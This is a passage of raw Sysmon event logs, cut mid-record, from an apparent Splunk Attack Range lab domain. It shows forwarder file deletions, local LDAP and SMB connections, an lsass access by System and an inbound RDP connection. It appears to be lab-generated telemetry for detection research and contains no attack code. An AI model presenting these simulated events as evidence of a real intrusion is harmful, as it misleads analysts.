Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B43A6C5B7451391E46AE3ECC7CB5D9,SHA256=DD6A854F0BA9498D022DBFEDB77FADA584472DDF511A684453F0E76914A7B963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54857CCDDCF9791F1989BC69FE7C750D,SHA256=47994C294B3EA779DB01710D1C9985EDF4E4723E99D4053355CA71EC373A98DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:08.332{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A90AFD130DF178AB47CAE0481D9FF57,SHA256=AAB3FEC079E68E444C202AB995DBC83F58CA2763692E4809B04CB40CA93856CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:08.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA937D0BCE7F2A7866F7A5C8861206C,SHA256=7FF4562BAD466C421065D9D85092D0F93303A5565CBC03872E8143253FD8714F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:09.363{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F050D7563C05EE8887BB2FA605C8037,SHA256=EE9CFE2A6AB887087B4C3FB01C85936BB8B1FD021BD1ACF824A2932B2240DD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:09.109{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C94923BC9E6A187890440AF5FF0216,SHA256=6322E0513F878E15CC471CB8F536FFAB019A0A14F66850E29E84CEB7B8221682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:10.395{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5668137374DDA43F4850642CCF353E6D,SHA256=21CB6A1F04CBFFDA2144C3E25A5600D6E661F812446FB2A1CF30D3F47138232A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:10.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001045970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:10.123{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75762C31D2F8A9508B9EC8DE0377E9A,SHA256=79CB4F5CDC797E83B67959643D0335FCE89DC17A333D2C3BF0A1246EBB33E2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.441{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1257DF19DFB269C60AE3D84487BC90BB,SHA256=0ADFC8AF63516368EDAF252723F7ED42192E43F01EDD39AFFF74C557BEBBDCDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.251{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50905-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.251{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50905-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001045976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9ABE4F4CAEFDC527840058A6E15FD56,SHA256=AD6FCE8A29DB3BC23D05737B30262E38A69800DF9BE436C09D6838EB22680B97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0254C31A1A63D6EC0FC257B6F370D30,SHA256=0E69469BAE4A8351551C7D15468D8B25F2E59F97599CEE22219FC7144C98917D,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001045974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:03.891{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57155-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001045973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:03.810{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50904-false10.0.1.12-8000- 23542300x80000000000000001045972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7C8767F43A9270CEB159CCA760D3E8,SHA256=5BDE3AB5D8425F2C4303C2F62904531942F750589F9FE079432D52AD9682FAC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D585CE5E9B65BB526C064D826E460672,SHA256=41196DF8BC374D71A5ED3FCD1A2FE9C85BD5EDF0E17B4D870C6BA598ACAFE066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8144061D94BE60169DD3A6AABA4C8C89,SHA256=B902A100C46DDCA510FE94EB5FF14DF5FB36E5C371A246F037EC7A3F9B2895D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:09.215{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57154-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:12.473{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D2DF01C27C275041CAC6AD7547C96B,SHA256=A783644B3C097F2144F7E1D684EAC390C6874D2FC17161DCD7CA792DF1D2DB96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:12.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D505DBA3BC9155AB44036A8F5144DC1,SHA256=5B41486B9DC22A34E724526AB010EEF86C8976F889C7094B98FF4200753B1FC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:10.181{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-38730-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 
23542300x8000000000000000806059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:13.504{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DF4F9BB1062400367968C77344B4D6,SHA256=C867894929327CD3FEF8A52A787A17B4E16E05E0AA8CFDF0E9665C007E079885,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.370{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50909-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001045987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.370{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50909-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001045986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.367{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001045985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.367{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 
354300x80000000000000001045984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.366{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.366{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.259{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local50906-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001045981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.259{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50906-false10.0.1.14win-dc-890.attackrange.local389ldap 23542300x80000000000000001045980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:13.160{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337489B19ADDAF0A184C30B1A08F01CC,SHA256=187FDC34F38AE2860CB8C8EFDAD0710510AF7EFD4915DB1F9F112CE8CA153567,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:10.487{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57155-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:14.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D3547F54185C4FBF9D2FF21656A418,SHA256=5D118B88A7E44FB1368784639D34E4BD778B5702794E29E9481E301D69FC92D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:14.196{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EBECD9DF45ADC106EA726FAF5D04A5,SHA256=CDD4309CCB5DF9D8AE90763293457D4DA77D89B76BB5143DACA59058603CFD9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:15.542{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0D662D18753E6F2A07F24E522F5B31,SHA256=52C857DDF1ADFFC72C07E2A0F9DCCF346CEA3057C094C8D7EB90CB4D585D597E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.357{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9ABE4F4CAEFDC527840058A6E15FD56,SHA256=AD6FCE8A29DB3BC23D05737B30262E38A69800DF9BE436C09D6838EB22680B97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.210{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF3AB04038C96EC5D0BC0A916EAE956D,SHA256=2941C87323506F2808444D1E81BEB6917C0ECD03107D982FF785E9290643B66C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:16.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6C163C47073A610748B0B041CA23ABA,SHA256=B3C2F86F1032BB0595E612FBA98D7457F646452BFC7B7DEAAF4EB1B08E72F0F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.883{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50910-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.883{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50910-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:16.225{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542524A53F620CA327E9B620998A9F9C,SHA256=8D2817591AAF519C35D2D34BE638F6333BB831C1681653A54481D0F4D28F6D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:17.651{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01ED1FA7F231DD8D4D2708417E6E53E,SHA256=FAAD1C91802696EDAD4143D52650D8CE64FCD4FE9BB418593845AEF0316B9BF4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:09.812{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50911-false10.0.1.12-8000- 23542300x80000000000000001045995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:17.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA9A66F9F9521BC0E7B8116D5D1CBBC,SHA256=DF2F551148DCD5FAD453F407DE63BECF90AD6F5FCB6228B71FAB7F12AC9AA832,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:15.191{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57156-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:18.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA31593DB1BE467AB69E009FBA585047,SHA256=0A86591B44872674AA095F003466685D7B10F40FC77496B6A8736D7BC4D706B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:18.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33DCD40E04E1B095F436ADE8576E554,SHA256=D3B10DAC36F18A5CE4C75ED64E35263616923912BE17D743F173C616B5BB1EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:18.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:19.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C00118FAAFB2292B6759E4EC07DB51BA,SHA256=694BE508649C568D0D0410FB3F447D4B94411B1B9FC62396819CCD9D0D801E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:19.272{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FFC98216B8186FD1D417F617A1E2AD,SHA256=B068ED4B1D1D5761FC3A8B39454836090FCC23CB58699FFA1B31DDB30AE1EA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=083E3CAC5DE3E3D0AAC44801B36C0D93,SHA256=460026F4EAD1EDD198F2597242ECCB28600366F727EEB8A7634329802568DCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:20.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E01DF148C56DEEBEEC1B50AA263958E,SHA256=5C368C3B93DE4CA8CBAB8FCD61C3C93BE307A65BFB58B68EFC92DB0CC434D64B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.323{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:21.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 